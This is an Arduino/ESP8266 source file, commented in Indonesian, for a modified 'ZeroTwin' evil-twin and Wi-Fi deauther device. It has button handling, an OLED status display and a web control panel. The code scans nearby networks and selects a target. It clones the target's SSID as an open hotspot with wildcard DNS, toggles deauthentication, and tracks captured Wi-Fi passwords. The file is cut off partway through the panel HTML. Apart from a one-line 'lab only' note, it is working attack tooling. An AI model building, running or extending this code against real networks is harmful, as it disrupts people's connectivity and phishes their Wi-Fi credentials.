// ============================================================================
// ZEROTWIN MODIFIED — evil twin + deauther + tombol fisik + monitor HP
// Base: ZeroTwin v1.0 (github.com/shinyxn) — logika deauth & evil-twin asli
// dipertahankan. Yang diubah:
//   1. tombol fisik (ADC A0 resistor ladder ATAU pin digital) + debounce
//   2. delay() di setup dihapus -> web langsung siap, OLED digambar non-blocking
//   3. /api/status + baris monitoring di panel HP
// Hanya untuk lab/jaringan milik sendiri.
// ============================================================================
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <SPI.h>
#include <Wire.h>
#include <Adafruit_GFX.h>
#include <Adafruit_SSD1306.h>
#include <Fonts/Picopixel.h>

extern "C" {
#include "user_interface.h"
}

/* AP kontrol */
const char AP_SSID[] = "ZeroTwin v1.0";
const char AP_PASS[] = "zero8888";

/* OLED */
#define SCREEN_WIDTH  128
#define SCREEN_HEIGHT 64
Adafruit_SSD1306 display(SCREEN_WIDTH, SCREEN_HEIGHT, &Wire, -1);

/* Tombol fisik: 0 = ADC A0 (rangkain resistor), 1 = pin digital INPUT_PULLUP */
#define BTN_ADC       0
#define BTN_PIN       A0
#define BTN_ENABLED   1

const unsigned char zeroTwinBoot [] PROGMEM = {
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x20, 0x00, 0x00, 0x00, 0x07, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xc0, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xc0, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x01, 0xc0, 0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x02, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x06, 0x80, 0x00, 0x00, 0x01, 0x03, 0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x05, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x0d, 0x00, 0x00, 0x00, 0x01, 0x03, 0xff, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x0c, 0x00, 0x00, 0x01, 0x01, 0x03, 0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1c, 0x00, 0x00, 0x00, 0x07, 0x23, 0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1e, 0x00, 0x00, 0x00, 0x1e, 0xc3, 0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3e, 0x00, 0x30, 0x00, 0xff, 0xc3, 0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0x00, 0x70, 0x03, 0xff, 0xc3, 0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0xd0, 0x70, 0x0f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xf8, 0x30, 0x1f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xf8, 0x30, 0x1f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xf8, 0x10, 0x0f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfc, 0x00, 0x0f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x0f, 0xff, 0x83, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x07, 0xff, 0x81, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x07, 0xff, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x03, 0xfc, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x01, 0xff, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x01, 0xfe, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf8, 0x00, 0x00, 0x04, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf8, 0x00, 0x00, 0x40, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf8, 0x00, 0x00, 0x00, 0x11, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x00, 0x00, 0x20, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfc, 0x00, 0x0f, 0xf8, 0x60, 0x7f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfc, 0x00, 0x3f, 0xfc, 0xea, 0x3f, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfe, 0x00, 0x7f, 0xfd, 0xcd, 0xdf, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfe, 0x00, 0xff, 0xff, 0xdf, 0x9f, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0xfc, 0x00, 0xff, 0xff, 0xff, 0xbf, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0xfc, 0x00, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0xfc, 0x00, 0xff, 0xff, 0x7f, 0xdf, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1f, 0xf4, 0x00, 0xff, 0xff, 0x3f, 0xdf, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1f, 0xf0, 0x00, 0xff, 0xff, 0x8f, 0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1f, 0xf0, 0x00, 0x7f, 0xff, 0x87, 0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x0f, 0xe0, 0x00, 0x7f, 0xff, 0x83, 0xff, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x07, 0xe0, 0x00, 0x7f, 0xff, 0x83, 0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x07, 0xe0, 0x00, 0x3f, 0xff, 0x83, 0xe7, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x03, 0xe0, 0x00, 0x3f, 0xff, 0x83, 0xf7, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x01, 0xe0, 0x00, 0x1f, 0xff, 0x83, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xe0, 0x00, 0x0f, 0xff, 0x81, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xe0, 0x00, 0x0f, 0xff, 0x80, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x40, 0x00, 0x0f, 0xff, 0x80, 0x7e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x0f, 0xff, 0x80, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x0f, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x03, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x03, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

const unsigned char zeroTwinIcon [] PROGMEM = {
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xf8, 0x00, 0x1f, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfe, 0x00, 0x00, 0x00, 0x7f, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x0f, 0xff, 0xfc, 0x00, 0x00, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x03, 0xff, 0xff, 0xff, 0xc0, 0x00, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x0f, 0xff, 0xff, 0xff, 0xfc, 0x00, 0x1f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfc, 0x1f, 0xff, 0xff, 0xff, 0xff, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xf8, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xc1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xc0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xc0, 0x0f, 0xff, 0xff, 0xff, 0xff, 0xec, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xe0, 0x01, 0xff, 0xff, 0xff, 0xfe, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xf0, 0x00, 0x0f, 0xff, 0xff, 0xf0, 0x00, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x3f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf0, 0x00, 0x00, 0x00, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xfe, 0x00, 0x00, 0x0f, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xff, 0x00, 0x00, 0x7f, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xfe, 0x00, 0x00, 0x1f, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xf8, 0x00, 0x00, 0x07, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xf0, 0x00, 0x00, 0x03, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xc0, 0x00, 0x00, 0x01, 0xfe, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0x80, 0x00, 0x00, 0x00, 0x7c, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x71, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x1f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x01, 0x00, 0x01, 0x00, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x10, 0x00, 0x01, 0x80, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x10, 0x00, 0x01, 0x80, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x10, 0x00, 0x01, 0x80, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x18, 0x00, 0x11, 0xc0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x38, 0x04, 0x18, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x30, 0x04, 0x3f, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x00, 0x3c, 0x7e, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x0c, 0x3f, 0xfe, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x18, 0x1f, 0xfc, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x18, 0x1f, 0xfc, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x18, 0x3f, 0xfe, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x0c, 0x3f, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x0f, 0xff, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x07, 0xff, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfc, 0x00, 0x07, 0xff, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfc, 0x00, 0x03, 0xff, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xf8, 0x00, 0x03, 0xfe, 0xff, 0xc0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xf3, 0x00, 0x01, 0xff, 0xff, 0x80, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xe7, 0x00, 0x00, 0x3f, 0xfe, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xef, 0x00, 0x00, 0x0f, 0xf0, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x03, 0xe0, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x03, 0xe0, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
// ---------------- state ------------------------------------------------------
typedef struct {
  String  ssid;
  uint8_t ch;
  uint8_t bssid[6];
  uint8_t rssi;
} _Network;

const byte DNS_PORT = 53;
IPAddress  apIP(192, 168, 4, 1);
DNSServer  dnsServer;
ESP8266WebServer webServer(80);

_Network _networks[16];
_Network _selectedNetwork;

bool hotspot_active  = false;
bool deauthing_active = false;

String _correct     = "";
String _tryPassword = "";
String lastEvent    = "boot";

unsigned long now = 0, wifinow = 0, deauth_now = 0, oled_now = 0;
unsigned long sentFrames = 0;

int  btnRaw = 0, btnLastVal = 0, btnCand = -1, btnCandCnt = 0;
const char* btnLast = "-";

// ---------------- util -------------------------------------------------------
String bytesToStr(const uint8_t* b, uint32_t size){
  String str;
  for(uint32_t i = 0; i < size; i++){
    if(b[i] < 0x10) str += '0';
    str += String(b[i], HEX);
    if(i < size - 1) str += ':';
  }
  return str;
}

void clearArray(){
  for(int i = 0; i < 16; i++) _networks[i] = _Network();
}

void performScan(){
  int n = WiFi.scanNetworks();
  clearArray();
  if(n > 0){
    for(int i = 0; i < n && i < 16; i++){
      _Network net;
      net.ssid = WiFi.SSID(i);
      net.rssi = WiFi.RSSI(i);
      net.ch   = WiFi.channel(i);
      const uint8_t* b = WiFi.BSSID(i);
      if(b) memcpy(net.bssid, b, 6);
      _networks[i] = net;
    }
  }
  WiFi.scanDelete();
}

// ---------------- OLED status (non-blocking) --------------------------------
void oledStatus(const String& ev){
  if(ev.length()) lastEvent = ev;
  display.clearDisplay();
  display.setFont();
  display.setTextSize(1);
  display.setTextColor(WHITE);
  display.setCursor(0, 0);  display.print("Zer0Twin  "); display.print(millis()/1000); display.println("s");
  display.setCursor(0, 8);  display.print("AP : "); display.println(AP_SSID);
  display.setCursor(0, 16); display.print("Tgt: "); display.println(_selectedNetwork.ssid.length() ? _selectedNetwork.ssid : String("-"));
  display.setCursor(0, 24); display.print("D:"); display.print(deauthing_active ? "ON " : "off");
  display.print("  T:"); display.println(hotspot_active ? "ON" : "off");
  display.setCursor(0, 32); display.print("Pkt: "); display.println(sentFrames);
  display.setCursor(0, 40); display.print("Pass: "); display.println(_tryPassword.length() ? _tryPassword : String("-"));
  display.setCursor(0, 48); display.print("Btn: "); display.print(btnLast); display.print(" raw="); display.println(btnRaw);
  display.setCursor(0, 56); display.println(ev);
  display.display();
}

// ---------------- tombol fisik ----------------------------------------------
int readButton(){
#if BTN_ADC
  int v = analogRead(BTN_PIN);
  btnRaw = v;
  if(v > 1000) return 0;
  if(v > 750)  return 1;
  if(v > 550)  return 2;
  if(v > 350)  return 3;
  if(v > 150)  return 4;
  return 5;
#else
  int v = digitalRead(BTN_PIN);
  btnRaw = v;
  return v == LOW ? 1 : 0;
#endif
}

void startHotspot(){
  if(_selectedNetwork.ssid.length() == 0) return;
  dnsServer.stop();
  WiFi.softAPdisconnect(true);
  WiFi.softAPConfig(IPAddress(192,168,4,1), IPAddress(192,168,4,1), IPAddress(255,255,255,0));
  WiFi.softAP(_selectedNetwork.ssid.c_str());
  dnsServer.start(53, "*", IPAddress(192,168,4,1));
  hotspot_active = true;
  oledStatus("twin ON: " + _selectedNetwork.ssid);
}

void stopHotspot(){
  hotspot_active = false;
  dnsServer.stop();
  WiFi.softAPdisconnect(true);
  WiFi.softAPConfig(IPAddress(192,168,4,1), IPAddress(192,168,4,1), IPAddress(255,255,255,0));
  WiFi.softAP(AP_SSID, AP_PASS);
  dnsServer.start(53, "*", IPAddress(192,168,4,1));
  oledStatus("twin off");
}

void stopAll(){
  deauthing_active = false;
  if(hotspot_active) stopHotspot();
  oledStatus("semua stop");
}

void handleButtons(){
#if BTN_ENABLED
  int b = readButton();
  if(b != btnCand){ btnCand = b; btnCandCnt = 0; return; }
  if(btnCandCnt < 5){ btnCandCnt++; return; }     // wajib stabil ~25 ms
  if(b == 0){ btnLastVal = 0; return; }
  if(b == btnLastVal) return;
  btnLastVal = b;

  if(b == 1){
    btnLast = "UP";
    for(int i = 0; i < 15; i++){
      if(_networks[(i+1) % 16].ssid.length() && _networks[i].ssid == _selectedNetwork.ssid){
        _selectedNetwork = _networks[(i+1) % 16]; break;
      }
    }
    if(_selectedNetwork.ssid.length() == 0 && _networks[0].ssid.length()) _selectedNetwork = _networks[0];
    oledStatus("target: " + _selectedNetwork.ssid);
  } else if(b == 2){
    btnLast = "DOWN";
    performScan();
    oledStatus("scan ulang");
  } else if(b == 3){
    btnLast = "OK";
    deauthing_active = !deauthing_active;
    oledStatus(deauthing_active ? "deauth ON" : "deauth off");
  } else if(b == 4){
    btnLast = "BACK";
    hotspot_active ? stopHotspot() : startHotspot();
  } else {
    btnLast = "EXTRA";
    stopAll();
  }
  oled_now = 0;
#endif
}

// ---------------- halaman ---------------------------------------------------
const char PANEL_HEAD[] PROGMEM = R"HTML(
<html><head><meta name='viewport' content='initial-scale=1.0, width=device-width'>
<title>ZeroTwin</title><style>
body{background:#1a1a1a;color:#bfbfbf;font-family:sans-serif;margin:0}
.content{max-width:800px;margin:auto;padding:.5em}
table{border-collapse:collapse;width:100%}
th,td{padding:8px 6px;text-align:left;border:solid rgb(204,12,207) 1px;font-size:.85em}
button{height:34px;padding:0 14px;color:#fff;font-size:11px;font-weight:600;letter-spacing:.1rem;
text-transform:uppercase;background:#2f3136;border-radius:4px;border:none;cursor:pointer}
button:hover{background:#42444a}
h1{font-size:1.4rem;background:#2f3136;color:#bfbfbb;padding:.2em .6em;border-radius:3px;
border-left:solid #d1114d 5px;font-weight:100}
#mon{font-family:monospace;color:#37c6f0;font-size:.8em;padding:.4em 0;word-break:break-all}
</style></head><body><div class='content'>
<h1 style="text-align:center;font-size:2rem;border:solid #bd0b61 3px">Zer0Twin v1.0</h1>
<div id='mon'>memuat status...</div>
<h1>Att4ck</h1>
)HTML";

String panelHtml(){
  String _html = FPSTR(PANEL_HEAD);

  _html += "<div><form style='display:inline-block' method='post' action='/?deauth=";
  _html += deauthing_active ? "stop'><button" : "start'><button";
  if(_selectedNetwork.ssid.length() == 0) _html += " disabled";
  _html += ">"; _html += deauthing_active ? "Stop Deauth" : "Start Deauth";
  _html += "</button></form>";

  _html += "<form style='display:inline-block;padding-left:8px' method='post' action='/?hotspot=";
  _html += hotspot_active ? "stop'><button" : "start'><button";
  if(_selectedNetwork.ssid.length() == 0 && !hotspot_active) _html += " disabled";
  _html += ">"; _html += hotspot_active ? "Stop Evil-Twin" : "Start Evil-Twin";
  _html += "</button></form>";

  _html += "<form style='display:inline-block;padding-left:8px' method='post' action='/?stop=1'>"
           "<button>Stop Semua</button></form></div>";

  _html += "<h1>P4nel</h1><table><tr><th>SSID</th><th>RSSI</th><th>BSSID</th><th>CH</th><th></th></tr>";
  for(int i = 0; i < 16; i++){
    if(_networks[i].ssid == "") break;
    _html += "<tr><td>" + _networks[i].ssid + "</td><td>" + String(_networks[i].rssi) +
             "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "</td>";
    _html += "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";
